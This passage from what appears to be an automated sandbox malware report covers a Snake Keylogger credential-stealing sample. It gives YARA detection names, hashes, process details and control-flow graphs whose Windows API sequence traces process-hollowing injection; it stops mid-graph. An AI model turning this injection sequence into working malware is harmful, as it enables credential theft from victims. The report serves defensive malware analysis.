                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:2
                                                Start time:11:24:01
                                                Start date:27/03/2024
                                                Path:C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\PT98765445670009.scr.exe"
                                                Imagebase:0x990000
                                                File size:638'464 bytes
                                                MD5 hash:90A34E7D570FA7C219EB5F1F193611BA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.3688666945.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:5.9%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:76%
                                                  Total number of Nodes:25
                                                  Total number of Limit Nodes:1
                                                  execution_graph 11639 2d4ab58 11640 2d4ab72 11639->11640 11641 2d4abc2 11640->11641 11643 2d4ac18 11640->11643 11644 2d4ac4b 11643->11644 11663 2d49f6c 11644->11663 11646 2d4ae22 11647 2d49f78 Wow64GetThreadContext 11646->11647 11648 2d4af1c 11646->11648 11647->11648 11649 2d49f90 ReadProcessMemory 11648->11649 11650 2d4affc 11649->11650 11662 2d4a948 VirtualAllocEx 11650->11662 11651 2d4b119 11661 2d4a7f0 WriteProcessMemory 11651->11661 11652 2d4b3f8 11659 2d4a7f0 WriteProcessMemory 11652->11659 11653 2d4b1fd 11653->11652 11657 2d4a7f0 WriteProcessMemory 11653->11657 11654 2d4b436 11655 2d4b51e 11654->11655 11658 2d4a6c8 Wow64SetThreadContext 11654->11658 11660 2d4aa68 ResumeThread 11655->11660 11656 2d4b5db 11656->11640 11657->11653 11658->11655 11659->11654 11660->11656 11661->11653 11662->11651 11664 2d4b748 CreateProcessW 11663->11664 11666 2d4b92e 11664->11666

                                                  Executed Functions

                                                  Function 02D4AC18 Relevance: 1.9, Strings: 1, Instructions: 615COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 34 2d4ac18-2d4ac49 35 2d4ac50-2d4add6 34->35 36 2d4ac4b 34->36 43 2d4adfd-2d4ae42 call 2d49f6c 35->43 44 2d4add8-2d4adfc 35->44 36->35 48 2d4ae44-2d4ae60 43->48 49 2d4ae6b-2d4aed5 43->49 44->43 48->49 55 2d4aed7 49->55 56 2d4aedc-2d4af08 49->56 55->56 58 2d4af69-2d4af9b call 2d49f84 56->58 59 2d4af0a-2d4af17 call 2d49f78 56->59 64 2d4afc4 58->64 65 2d4af9d-2d4afb9 58->65 63 2d4af1c-2d4af3c 59->63 66 2d4af65-2d4af67 63->66 67 2d4af3e-2d4af5a 63->67 68 2d4afc5-2d4afcf 64->68 65->64 66->68 67->66 70 2d4afd6-2d4b01c call 2d49f90 68->70 71 2d4afd1 68->71 77 2d4b045-2d4b05e 70->77 78 2d4b01e-2d4b03a 70->78 71->70 79 2d4b0b6-2d4b12e call 2d4a948 77->79 80 2d4b060-2d4b08c call 2d49f9c 77->80 78->77 92 2d4b130-2d4b141 79->92 93 2d4b143-2d4b145 79->93 86 2d4b0b5 80->86 87 2d4b08e-2d4b0aa 80->87 86->79 87->86 94 2d4b14b-2d4b15f 92->94 93->94 95 2d4b161-2d4b19b 94->95 96 2d4b19c-2d4b1b3 94->96 95->96 97 2d4b1b5-2d4b1d1 96->97 98 2d4b1dc-2d4b21d call 2d4a7f0 96->98 97->98 102 2d4b246-2d4b27b 98->102 103 2d4b21f-2d4b23b 98->103 107 2d4b3d3-2d4b3f2 102->107 103->102 108 2d4b280-2d4b304 107->108 109 2d4b3f8-2d4b456 call 2d4a7f0 107->109 120 2d4b3c8-2d4b3cd 108->120 121 2d4b30a-2d4b37c call 2d4a7f0 108->121 115 2d4b47f-2d4b4b2 109->115 116 2d4b458-2d4b474 109->116 122 2d4b4b4-2d4b4bb 115->122 123 2d4b4bc-2d4b4cf 115->123 116->115 120->107 132 2d4b37e-2d4b39e 121->132 122->123 125 2d4b4d6-2d4b501 123->125 126 2d4b4d1 123->126 130 2d4b503-2d4b51c call 2d4a6c8 125->130 131 2d4b56b-2d4b59d call 2d49fa8 125->131 126->125 134 2d4b51e-2d4b53e 130->134 140 2d4b5c6 131->140 141 2d4b59f-2d4b5bb 131->141 135 2d4b3c7 132->135 136 2d4b3a0-2d4b3bc 132->136 138 2d4b567-2d4b569 134->138 139 2d4b540-2d4b55c 134->139 135->120 136->135 143 2d4b5c7-2d4b5d9 call 2d4aa68 138->143 139->138 140->143 141->140 147 2d4b5db-2d4b5fb 143->147 150 2d4b624-2d4b72d 147->150 151 2d4b5fd-2d4b619 147->151 151->150
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1239754563.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2d40000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (
                                                  • API String ID: 0-3887548279
                                                  • Opcode ID: 71ee7f545c7406b93193e9ed32c290d1751eed36578f84a81d2bea18b9f99e76
                                                  • Instruction ID: 0d6662f68e12d227a81fccb07a10be667f6993790fc1caf283e0b54f4c0260d2
                                                  • Opcode Fuzzy Hash: 71ee7f545c7406b93193e9ed32c290d1751eed36578f84a81d2bea18b9f99e76
                                                  • Instruction Fuzzy Hash: E252B074D012288FDB64DF65C994BEDBBB2BF89304F1081EAD409AB295DB349E85CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02D49F6C Relevance: 1.7, APIs: 1, Instructions: 223processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 162 2d49f6c-2d4b7d3 164 2d4b7d5-2d4b7e7 162->164 165 2d4b7ea-2d4b7f8 162->165 164->165 166 2d4b80f-2d4b84b 165->166 167 2d4b7fa-2d4b80c 165->167 168 2d4b84d-2d4b85c 166->168 169 2d4b85f-2d4b92c CreateProcessW 166->169 167->166 168->169 173 2d4b935-2d4b9f4 169->173 174 2d4b92e-2d4b934 169->174 184 2d4b9f6-2d4ba1f 173->184 185 2d4ba2a-2d4ba35 173->185 174->173 184->185
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02D4B919
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1239754563.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2d40000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 23a79a1671b4c668726c50b812c0fea1336e7d85c89064ffa94cf468946879a6
                                                  • Instruction ID: b56b2bf80196afd020765c6bd81fa516c1c8ffcfd7c151cc92d13b65441dabce
                                                  • Opcode Fuzzy Hash: 23a79a1671b4c668726c50b812c0fea1336e7d85c89064ffa94cf468946879a6
                                                  • Instruction Fuzzy Hash: D681CD75C00229DFDB24CFA5C884BEDBBF5BB59304F1091AAE509B7260DB349A89CF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02D4A7F0 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 189 2d4a7f0-2d4a85b 191 2d4a872-2d4a8d3 WriteProcessMemory 189->191 192 2d4a85d-2d4a86f 189->192 194 2d4a8d5-2d4a8db 191->194 195 2d4a8dc-2d4a92e 191->195 192->191 194->195
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02D4A8C3
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1239754563.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2d40000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: d42205c2666afb84f8eeef0c810a2cda86a56bac082c041af2ba488078666822
                                                  • Instruction ID: 9e88b3668da972740da7075d19f5566826521db2a237f08d6ed40e1a8ca021c4
                                                  • Opcode Fuzzy Hash: d42205c2666afb84f8eeef0c810a2cda86a56bac082c041af2ba488078666822
                                                  • Instruction Fuzzy Hash: 7E4199B4D012589FCF10CFA9D984AEEFBF1BB49310F14942AE818B7250D739AA45CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02D49F90 Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 200 2d49f90-2d4bc35 ReadProcessMemory 202 2d4bc37-2d4bc3d 200->202 203 2d4bc3e-2d4bc7c 200->203 202->203
                                                  APIs
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02D4BC25
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1239754563.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2d40000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: 6b6dc7a7c08d9d6074dd6016cd1dd231b4841abfeb8a07c9ba712ee254d05654
                                                  • Instruction ID: a7690961a98245c12f63c1523461b5557d97b3d0e3f2e3cbb3b3f97813cf548d
                                                  • Opcode Fuzzy Hash: 6b6dc7a7c08d9d6074dd6016cd1dd231b4841abfeb8a07c9ba712ee254d05654
                                                  • Instruction Fuzzy Hash: 854166B9D042589FCF10CFAAD984A9EFBB1BB19314F14A02AE814B7310D735AA45CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02D4A948 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 206 2d4a948-2d4aa02 VirtualAllocEx 209 2d4aa04-2d4aa0a 206->209 210 2d4aa0b-2d4aa55 206->210 209->210
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02D4A9F2
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1239754563.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2d40000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 72682b5c8d42103aa65b789c4f454766f446ea297d5b33f46260e84dcec06fc6
                                                  • Instruction ID: 3b94e268a0106d1b2cea8e99addc19a097aae390924f6616e3b5f622611ddeb5
                                                  • Opcode Fuzzy Hash: 72682b5c8d42103aa65b789c4f454766f446ea297d5b33f46260e84dcec06fc6
                                                  • Instruction Fuzzy Hash: 803198B8D042589FCF10CFA9D981ADEFBB1BB49310F10942AE815B7310DB35A946CF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02D4A6C8 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 215 2d4a6c8-2d4a728 217 2d4a73f-2d4a787 Wow64SetThreadContext 215->217 218 2d4a72a-2d4a73c 215->218 220 2d4a790-2d4a7dc 217->220 221 2d4a789-2d4a78f 217->221 218->217 221->220
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 02D4A777
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1239754563.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2d40000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 9d8635583134457e1fd3257f510c3dd5509e08d5096dd11a42437702bc55f174
                                                  • Instruction ID: 974d6eea37b6407e101aac5292240c83a0091a308157f1508f8c1c047d7310c4
                                                  • Opcode Fuzzy Hash: 9d8635583134457e1fd3257f510c3dd5509e08d5096dd11a42437702bc55f174
                                                  • Instruction Fuzzy Hash: E831BBB4D012589FDB10DFAAD984AEEFBF1BB49310F24802AE418B7340DB39A945CF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02D49F78 Relevance: 1.6, APIs: 1, Instructions: 91threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 226 2d49f78-2d4bac4 228 2d4bac6-2d4bad8 226->228 229 2d4badb-2d4bb22 Wow64GetThreadContext 226->229 228->229 230 2d4bb24-2d4bb2a 229->230 231 2d4bb2b-2d4bb63 229->231 230->231
                                                  APIs
                                                  • Wow64GetThreadContext.KERNEL32(?,?), ref: 02D4BB12
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1239754563.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2d40000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: c61e81bf2d0be6db93ba9124a0a923ed398603b2e4a5b3821216ba56ef283ef2
                                                  • Instruction ID: b3aeb08624e6ca5c6e8de6649dcdd7026b95dfba4489b0bc3d65cc66698036aa
                                                  • Opcode Fuzzy Hash: c61e81bf2d0be6db93ba9124a0a923ed398603b2e4a5b3821216ba56ef283ef2
                                                  • Instruction Fuzzy Hash: AC31A9B4D012589FCB14CFAAD984ADEFBF1BB09314F24802AE418B7310D778A945CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02D4AA68 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 234 2d4aa68-2d4aaf6 ResumeThread 237 2d4aaff-2d4ab41 234->237 238 2d4aaf8-2d4aafe 234->238 238->237
                                                  APIs
                                                  • ResumeThread.KERNELBASE(?), ref: 02D4AAE6
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1239754563.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2d40000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 6d47210b202a1b60b05d2f6bee76485d8997fb72264aba7367b795d85f36deb1
                                                  • Instruction ID: 97cd3e23e3f934f4170eb79dc417cc4f1cac1f10eb0c14f2f64a521331a483b0
                                                  • Opcode Fuzzy Hash: 6d47210b202a1b60b05d2f6bee76485d8997fb72264aba7367b795d85f36deb1
                                                  • Instruction Fuzzy Hash: A831AAB4D013189FCB14CFAAD985A9EFBB5BB49310F14942AE815B7340DB35A941CF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0120D5B8 Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 294 120d5b8-120d5ca 295 120d5d0 294->295 296 120d65e-120d665 294->296 297 120d5d2-120d5de 295->297 296->297 298 120d5e4-120d606 297->298 299 120d66a-120d66f 297->299 301 120d674-120d689 298->301 302 120d608-120d626 298->302 299->298 306 120d640-120d648 301->306 305 120d62e-120d63e 302->305 305->306 307 120d696 305->307 308 120d64a-120d65b 306->308 309 120d68b-120d694 306->309 309->308
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1239516907.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_120d000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 745b5f58cecfbb9178fe72589d8fad8c8bb2baf80dc45e7c301a82497faed5d3
                                                  • Instruction ID: 3f6382f0a021dcc77bec5efed16a29b6984779bd4ae4931c8434e89dcf9d7e40
                                                  • Opcode Fuzzy Hash: 745b5f58cecfbb9178fe72589d8fad8c8bb2baf80dc45e7c301a82497faed5d3
                                                  • Instruction Fuzzy Hash: B2212571515208DFDB16DFD4E9C4B16BF65FB84324F20866DE9090B28BC336D456CBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0120D5B3 Relevance: .1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1239516907.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_120d000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                  • Instruction ID: 85c2da0d78b3234fdd9ff0a2e4fbac3f23c2a391a0f1a3038320562e8a1a2bf1
                                                  • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                  • Instruction Fuzzy Hash: E411B176504244CFCB16CF94D9C4B16BF72FB84324F2486A9D9090B697C336D456CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:15.5%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:29%
                                                  Total number of Nodes:62
                                                  Total number of Limit Nodes:7
                                                  execution_graph 24761 2c3d3d0 24762 2c3d3dc 24761->24762 24772 52c0d60 24762->24772 24779 52c0d50 24762->24779 24763 2c3d497 24786 52cc8b8 24763->24786 24790 52cc8a8 24763->24790 24764 2c3d4c1 24794 69d85fc 24764->24794 24801 69d8608 24764->24801 24765 2c3d5b6 24773 52c0d82 24772->24773 24774 52c0e4e 24773->24774 24808 52c7f8c 24773->24808 24814 52c7ba8 24773->24814 24820 52c7988 24773->24820 24824 52c7978 24773->24824 24774->24763 24780 52c0d82 24779->24780 24781 52c0e4e 24780->24781 24782 52c7f8c 2 API calls 24780->24782 24783 52c7978 2 API calls 24780->24783 24784 52c7988 LdrInitializeThunk 24780->24784 24785 52c7ba8 2 API calls 24780->24785 24781->24763 24782->24781 24783->24781 24784->24781 24785->24781 24787 52cc8da 24786->24787 24788 52c7ba8 2 API calls 24787->24788 24789 52cc9a4 24787->24789 24788->24789 24789->24764 24791 52cc8da 24790->24791 24792 52c7ba8 2 API calls 24791->24792 24793 52cc9a4 24791->24793 24792->24793 24793->24764 24795 69d862a 24794->24795 24796 69d873c 24795->24796 24797 52c7f8c 2 API calls 24795->24797 24798 52c7978 2 API calls 24795->24798 24799 52c7988 LdrInitializeThunk 24795->24799 24800 52c7ba8 2 API calls 24795->24800 24796->24765 24797->24796 24798->24796 24799->24796 24800->24796 24802 69d862a 24801->24802 24803 69d873c 24802->24803 24804 52c7f8c 2 API calls 24802->24804 24805 52c7978 2 API calls 24802->24805 24806 52c7988 LdrInitializeThunk 24802->24806 24807 52c7ba8 2 API calls 24802->24807 24803->24765 24804->24803 24805->24803 24806->24803 24807->24803 24812 52c7e43 24808->24812 24809 52c7f84 LdrInitializeThunk 24811 52c80e1 24809->24811 24811->24774 24812->24809 24813 52c7988 LdrInitializeThunk 24812->24813 24813->24812 24815 52c7bd9 24814->24815 24816 52c7d39 24815->24816 24817 52c7f84 LdrInitializeThunk 24815->24817 24819 52c7988 LdrInitializeThunk 24815->24819 24816->24774 24817->24816 24819->24815 24821 52c799a 24820->24821 24823 52c799f 24820->24823 24821->24774 24822 52c80c9 LdrInitializeThunk 24822->24821 24823->24821 24823->24822 24825 52c799a 24824->24825 24829 52c799f 24824->24829 24825->24774 24826 52c7f84 LdrInitializeThunk 24826->24825 24828 52c7988 LdrInitializeThunk 24828->24829 24829->24825 24829->24826 24829->24828 24830 52c8278 24831 52c8285 24830->24831 24832 52c827f 24830->24832 24832->24831 24833 52c7988 LdrInitializeThunk 24832->24833 24835 52c8606 24832->24835 24833->24835 24834 52c7988 LdrInitializeThunk 24834->24835 24835->24831 24835->24834

                                                  Executed Functions

                                                  Function 052C7988 Relevance: 2.0, APIs: 1, Instructions: 534COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 985 52c7988-52c7998 986 52c799f-52c79ab 985->986 987 52c799a 985->987 990 52c79ad 986->990 991 52c79b2-52c79c7 986->991 988 52c7acb-52c7ad5 987->988 990->988 994 52c79cd-52c79d8 991->994 995 52c7adb-52c7b1b 991->995 998 52c79de-52c79e5 994->998 999 52c7ad6 994->999 1012 52c7b22-52c7bd7 995->1012 1000 52c79e7-52c79fe 998->1000 1001 52c7a12-52c7a1d 998->1001 999->995 1011 52c7a04-52c7a07 1000->1011 1000->1012 1006 52c7a1f-52c7a27 1001->1006 1007 52c7a2a-52c7a34 1001->1007 1006->1007 1014 52c7abe-52c7ac3 1007->1014 1015 52c7a3a-52c7a44 1007->1015 1011->999 1016 52c7a0d-52c7a10 1011->1016 1042 52c7bde-52c7c74 1012->1042 1043 52c7bd9 1012->1043 1014->988 1015->999 1022 52c7a4a-52c7a66 1015->1022 1016->1000 1016->1001 1027 52c7a68 1022->1027 1028 52c7a6a-52c7a6d 1022->1028 1027->988 1030 52c7a6f-52c7a72 1028->1030 1031 52c7a74-52c7a77 1028->1031 1032 52c7a7a-52c7a88 1030->1032 1031->1032 1032->999 1035 52c7a8a-52c7a91 1032->1035 1035->988 1037 52c7a93-52c7a99 1035->1037 1037->999 1038 52c7a9b-52c7aa0 1037->1038 1038->999 1040 52c7aa2-52c7ab5 1038->1040 1040->999 1045 52c7ab7-52c7aba 1040->1045 1048 52c7d13-52c7d19 1042->1048 1043->1042 1045->1037 1047 52c7abc 1045->1047 1047->988 1049 52c7d1f-52c7d37 1048->1049 1050 52c7c79-52c7c8c 1048->1050 1051 52c7d39-52c7d46 1049->1051 1052 52c7d4b-52c7d5e 1049->1052 1053 52c7c8e 1050->1053 1054 52c7c93-52c7ce4 1050->1054 1055 52c80e1-52c81de 1051->1055 1056 52c7d65-52c7d81 1052->1056 1057 52c7d60 1052->1057 1053->1054 1072 52c7ce6-52c7cf4 1054->1072 1073 52c7cf7-52c7d09 1054->1073 1063 52c81e6-52c81f0 1055->1063 1064 52c81e0-52c81e5 1055->1064 1060 52c7d88-52c7dac 1056->1060 1061 52c7d83 1056->1061 1057->1056 1067 52c7dae 1060->1067 1068 52c7db3-52c7de5 1060->1068 1061->1060 1064->1063 1067->1068 1077 52c7dec-52c7e2e 1068->1077 1078 52c7de7 1068->1078 1072->1049 1074 52c7d0b 1073->1074 1075 52c7d10 1073->1075 1074->1075 1075->1048 1080 52c7e35-52c7e3e 1077->1080 1081 52c7e30 1077->1081 1078->1077 1082 52c8066-52c806c 1080->1082 1081->1080 1083 52c8072-52c8085 1082->1083 1084 52c7e43-52c7e68 1082->1084 1087 52c808c-52c80a7 1083->1087 1088 52c8087 1083->1088 1085 52c7e6f-52c7ea6 1084->1085 1086 52c7e6a 1084->1086 1096 52c7ead-52c7edf 1085->1096 1097 52c7ea8 1085->1097 1086->1085 1089 52c80ae-52c80c2 1087->1089 1090 52c80a9 1087->1090 1088->1087 1093 52c80c9-52c80df LdrInitializeThunk 1089->1093 1094 52c80c4 1089->1094 1090->1089 1093->1055 1094->1093 1099 52c7ee1-52c7f06 1096->1099 1100 52c7f43-52c7f56 1096->1100 1097->1096 1103 52c7f0d-52c7f3b 1099->1103 1104 52c7f08 1099->1104 1101 52c7f5d-52c7f82 1100->1101 1102 52c7f58 1100->1102 1107 52c7f84-52c7f85 1101->1107 1108 52c7f91-52c7fc9 1101->1108 1102->1101 1103->1100 1104->1103 1107->1083 1109 52c7fcb 1108->1109 1110 52c7fd0-52c8031 call 52c7988 1108->1110 1109->1110 1116 52c8038-52c805c 1110->1116 1117 52c8033 1110->1117 1120 52c805e 1116->1120 1121 52c8063 1116->1121 1117->1116 1120->1121 1121->1082
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3689982941.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_52c0000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1c7eb1611d109bccf473a8a2e7b98f5299841a19c1cbc875ca04b306164e995c
                                                  • Instruction ID: 6ead98727c01085bc3896e7dda510215f3be69518078521ffda94eee8604509b
                                                  • Opcode Fuzzy Hash: 1c7eb1611d109bccf473a8a2e7b98f5299841a19c1cbc875ca04b306164e995c
                                                  • Instruction Fuzzy Hash: 15220774E102198FDB14DFA8C884B9DBBB2FF88300F1486A9D449AB395DB759D86CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02C3B388 Relevance: 1.6, Strings: 1, Instructions: 381COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1122 2c3b388-2c3b39b 1123 2c3b3a1-2c3b3aa 1122->1123 1124 2c3b4da-2c3b4e1 1122->1124 1125 2c3b3b0-2c3b3b4 1123->1125 1126 2c3b4e4 1123->1126 1127 2c3b3b6 1125->1127 1128 2c3b3ce-2c3b3d5 1125->1128 1131 2c3b4e9-2c3b4f1 1126->1131 1129 2c3b3b9-2c3b3c4 1127->1129 1128->1124 1130 2c3b3db-2c3b3de 1128->1130 1129->1126 1132 2c3b3ca-2c3b3cc 1129->1132 1133 2c3b3e4-2c3b3e8 1130->1133 1136 2c3b4f3-2c3b510 1131->1136 1137 2c3b4bf-2c3b4c2 1131->1137 1132->1128 1132->1129 1133->1124 1135 2c3b3eb-2c3b401 1133->1135 1149 2c3b403-2c3b405 1135->1149 1150 2c3b406-2c3b40e 1135->1150 1140 2c3b512-2c3b52a 1136->1140 1141 2c3b53c 1136->1141 1138 2c3b4c3-2c3b4c7 1137->1138 1139 2c3b44f-2c3b457 1137->1139 1142 2c3b4c9 1138->1142 1143 2c3b4cd-2c3b4cf 1138->1143 1139->1133 1155 2c3b458-2c3b45c 1139->1155 1163 2c3b533-2c3b536 1140->1163 1164 2c3b52c-2c3b531 1140->1164 1144 2c3b53e-2c3b542 1141->1144 1142->1131 1146 2c3b4cb 1142->1146 1147 2c3b4d0-2c3b4d3 1143->1147 1146->1143 1147->1126 1154 2c3b4d5-2c3b4d8 1147->1154 1149->1150 1152 2c3b47b-2c3b47d 1150->1152 1153 2c3b40f 1150->1153 1152->1124 1158 2c3b47f-2c3b485 1152->1158 1157 2c3b410-2c3b416 1153->1157 1154->1124 1159 2c3b487-2c3b491 1154->1159 1160 2c3b462-2c3b464 1155->1160 1161 2c3b45e 1155->1161 1157->1152 1165 2c3b418-2c3b41e 1157->1165 1158->1124 1158->1159 1159->1131 1166 2c3b493-2c3b4ab 1159->1166 1162 2c3b469-2c3b46c 1160->1162 1161->1131 1161->1160 1162->1126 1167 